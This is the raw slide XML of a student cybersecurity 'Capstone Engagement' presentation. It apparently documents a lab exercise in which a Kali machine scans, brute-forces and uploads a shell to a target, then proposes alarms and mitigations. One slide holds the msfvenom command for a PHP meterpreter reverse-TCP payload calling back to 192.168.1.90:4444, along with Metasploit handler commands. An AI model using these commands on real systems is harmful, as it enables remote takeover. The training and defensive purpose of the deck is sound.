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Roboto" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId25"/>
      <p:bold r:id="rId26"/>
      <p:italic r:id="rId27"/>
      <p:boldItalic r:id="rId28"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId29"/>
      <p:bold r:id="rId30"/>
      <p:italic r:id="rId31"/>
      <p:boldItalic r:id="rId32"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId33"/>
      <p:bold r:id="rId34"/>
      <p:italic r:id="rId35"/>
      <p:boldItalic r:id="rId36"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin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EA61311-CA8F-4FB8-A01F-2EC4968B2E09}">
  <a:tblStyle styleId="{3EA61311-CA8F-4FB8-A01F-2EC4968B2E0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775" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="109" d="100"/>
          <a:sy n="109" d="100"/>
        </p:scale>
        <p:origin x="698" y="38"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz"/>
        <p:guide orient="horz" pos="22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8798eb4c4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8798eb4c4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8623a2bef4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8623a2bef4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8623a2bef4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8623a2bef4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8623a2bef4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8623a2bef4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8623a2bef4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8623a2bef4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8798eb4c4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8798eb4c4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8798eb4c44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8798eb4c44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8798eb4c4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8798eb4c4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8798eb4c4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8798eb4c4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8798eb4c44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8798eb4c44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8798eb4c44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8798eb4c44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8798eb4c44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8798eb4c44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798eb4c4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798eb4c4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8623a2bef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8623a2bef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8623a2bef4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8623a2bef4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" name="Google Shape;44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26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1" name="Google Shape;461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3" name="Google Shape;463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8" name="Google Shape;508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0" name="Google Shape;510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7" name="Google Shape;587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9" name="Google Shape;589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1" name="Google Shape;611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3" name="Google Shape;633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8" name="Google Shape;678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0" name="Google Shape;68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3" name="Google Shape;703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5" name="Google Shape;70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8" name="Google Shape;728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0" name="Google Shape;730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3" name="Google Shape;753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5" name="Google Shape;755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3" name="Google Shape;783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1" name="Google Shape;81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9" name="Google Shape;83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0" name="Google Shape;84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2" name="Google Shape;862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4" name="Google Shape;864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6" name="Google Shape;866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5" name="Google Shape;895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7" name="Google Shape;897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6" name="Google Shape;926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8" name="Google Shape;928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7" name="Google Shape;957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9" name="Google Shape;959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7" name="Google Shape;987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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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Capstone Engagement</a:t>
            </a:r>
            <a:endParaRPr sz="31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 dirty="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 dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3100" dirty="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br>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2800" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>By: Syed Rahman</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2800" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2800" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Date: 07-30-2020</a:t>
            </a:r>
            <a:endParaRPr sz="2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[Remote Command Execution]</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132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Processes: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Msfvenom was the main tool that was used to form/create a reverse shell payload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sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The reverse shell payload successfully exploited the victim's machine and  allowed the attacker to gain remote access over the victim's computer</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr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6" name="Google Shape;1146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63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r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Command:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>root@Kali</a:t>
            </a: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:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a: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 -p php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a: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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a: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>
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>lhost</a:t>
            </a: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=192.168.1.90 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>lport</a:t>
            </a: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=4444 &gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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msf5 exploit(multi/handler) &gt; set payload php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a: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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
            </a:b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payload =&gt; php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a: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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="020B0604020202020204" charset="0"/>
                <a:ea typeface="Roboto" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
            </a:b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64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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4" name="Google Shape;1154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11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6544BB-9954-4235-9E4F-C760F3E4E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16" y="2494382"/>
            <a:ext cx="8037809" cy="2159735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1159" name="Google Shape;1159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60" name="Google Shape;1160;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4917599" y="780730"/>
            <a:ext cx="4114800" cy="1464568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>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>10:49PM on July 21, 2020 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0">
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>Total that was sent was 22 on IP 192.168.1.1.05</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0">
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>The network. Transport: TCP </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161" name="Google Shape;1161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2" name="Google Shape;1162;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="23822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.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3" name="Google Shape;1163;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-339000" y="805448"/>
            <a:ext cx="5256600" cy="1464569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300" dirty="0"/>
              <a:t>What time did the port scan occur?</a:t>
            </a:r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endParaRPr sz="13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300" dirty="0"/>
              <a:t>How many packets were sent, and from which IP?</a:t>
            </a:r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endParaRPr sz="13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300" dirty="0"/>
              <a:t>What indicates that this was a port scan?</a:t>
            </a:r>
            <a:endParaRPr sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1164" name="Google Shape;116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5249" y="1292337"/>
            <a:ext cx="424701" cy="3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66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-412150" y="714706"/>
            <a:ext cx="5791200" cy="1166433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300" dirty="0"/>
              <a:t>What time did the request occur? </a:t>
            </a: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300" dirty="0"/>
              <a:t>How many requests were made?</a:t>
            </a:r>
            <a:endParaRPr sz="13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300" dirty="0"/>
              <a:t>Which files were requested? </a:t>
            </a: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300" dirty="0"/>
              <a:t>What did they contain?</a:t>
            </a:r>
            <a:endParaRPr sz="13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4580CF-1A32-4AFE-A398-0BF0EB7E2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00" y="1827094"/>
            <a:ext cx="7711200" cy="3084298"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1169" name="Google Shape;1169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0" name="Google Shape;1170;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4186000" y="745870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>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>It occurred on 12:45AM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>Total: 16,659</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1"/>
              <a:t>Company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1"/>
              <a:t>secret_folders</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>Login Credentials  </a:t>
            </a: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 dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171" name="Google Shape;1171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66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-172588" y="1902261"/>
            <a:ext cx="8633447" cy="3084298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74" name="Google Shape;117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3650" y="1037558"/>
            <a:ext cx="424701" cy="3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7488EB-0773-42BE-AD3B-71A7E2382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980" y="1929388"/>
            <a:ext cx="6855158" cy="2985147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179" name="Google Shape;1179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Analysis: Uncovering the Brute Force Attack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180" name="Google Shape;1180;p67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-267622" y="659788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>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>How many requests were made in the attack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0">
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>How many requests had been made before the attacker </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>discovered the password?</a:t>
            </a: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lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1181" name="Google Shape;1181;p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2" name="Google Shape;1182;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415392" y="1898869"/>
            <a:ext cx="8259145" cy="3015666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3" name="Google Shape;1183;p67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4111371" y="840221"/>
            <a:ext cx="5044929" cy="1120189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Total</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>: 13,653</a:t>
            </a:r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endParaRPr lang="en" sz="1200" dirty="0"/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Total: 13,652</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1184" name="Google Shape;118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1299" y="1128975"/>
            <a:ext cx="424701" cy="3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203C28F-38AC-4956-9F8E-1DA41B0A5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4" y="1652212"/>
            <a:ext cx="8933080" cy="299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9" name="Google Shape;1189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0" name="Google Shape;1190;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4759378" y="710283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>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Total: 312</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0">
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Requested files were: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>passwd.dav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>bonus.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, lib, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1191" name="Google Shape;1191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68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="44268" y="1579345"/>
            <a:ext cx="8994272" cy="329882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3" name="Google Shape;1193;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-410934" y="680512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How many requests were made to this directory?</a:t>
            </a:r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Which files were requested?</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1194" name="Google Shape;1194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9053" y="920449"/>
            <a:ext cx="424701" cy="3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Google Shape;1199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69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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1" name="Google Shape;1201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16</a:t>
            </a:fld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07" name="Google Shape;1207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70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What kind of alarm can be set to detect future port scans?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71450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network-based IPS (Intrusion Prevention System) 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Host-based IPS (HIPS)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What threshold would you set to activate this alarm?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- 150 Packets per second to avoid false positive </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209" name="Google Shape;1209;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4463296" y="14772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What configurations can be set on the host to mitigate port scans?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Strong firewalls to prevent access to ports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Restrict public access and only allow known IP Addresses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dirty="0"/>
              <a:t>Describe the solution. If possible, provide required command lines.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" dirty="0"/>
              <a:t>Blocking the traffic that comes from Attacker’s Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> firewall-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --zone=office --add-rich-rule="rule family='ipv4' source address='192.168.1.90' reject"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215" name="Google Shape;1215;p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71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What kind of alarm can be set to detect future unauthorized access?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Whenever someone accessed or requested to access the hidden directory from both internal/external source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dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?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- Everytime someone sucessfully/unsucessfully  attempts or accesss into the hidden directory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17" name="Google Shape;1217;p71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What configuration can be set on the host to block unwanted access?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/>
              <a:t>Multi-factor login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/>
              <a:t>Allow access only to a network  that is fully secure such as using VPN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dirty="0"/>
              <a:t>Describe the solution. If possible, provide required command lines.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" dirty="0"/>
              <a:t>This will safeguard intergrity and confiedentially of the hidden directory even if its from someone within the company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23" name="Google Shape;1223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72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What kind of alarm can be set to detect future brute force attacks?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/>
              <a:t>Limit Failed Login Attempts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" sz="14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sz="14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dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?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" dirty="0"/>
              <a:t>Login attempts made from unknown source/servers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" dirty="0"/>
              <a:t>More than 10 attempts made </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1225" name="Google Shape;1225;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4508842" y="1517114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What configuration can be set on the host to block brute force attacks?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     A Two-Factor Authentication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dirty="0"/>
              <a:t>Describe the solution. If possible, provide the required command line(s).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" dirty="0"/>
              <a:t>Improve Security. It the decreases the chances of an Attacker trying to access an User login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" dirty="0"/>
              <a:t>   Lower Helpdesk/Security Management Costs.  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231" name="Google Shape;1231;p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73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What kind of alarm can be set to detect future access to this directory?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 If an attempt is made from an unauthorized network trying to access WebDAV connection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dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?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-  When a user makes 5 attempts to access WebDAV connection within a 10-minute window </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1233" name="Google Shape;1233;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4470303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What configuration can be set on the host to control access?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 Only authorized users can access the network using VPN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>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Describe the solution. If possible, provide the required command line(s).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" dirty="0"/>
              <a:t>A VPN hides your real IP address masking your identity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" dirty="0"/>
              <a:t>It also makes your connection more secure by encrypting it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39" name="Google Shape;1239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74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What kind of alarm can be set to detect future file uploads?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Users that does not have permission to upload files within/outside the network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dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?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" dirty="0"/>
              <a:t>Any attempt a user made to upload any type/form of a file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41" name="Google Shape;1241;p74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What configuration can be set on the host to block file uploads?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/>
              <a:t>Set filters of the type of files that can be uploaded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/>
              <a:t>Users must authenticate they are allowed to upload files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3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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1058" name="Google Shape;1058;p57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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address Range: 192.168.1.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Netmask:255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gateway:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IPv4: 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS: Kali</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hostname: Attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IPv4: 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS: Linux</a:t>
            </a:r>
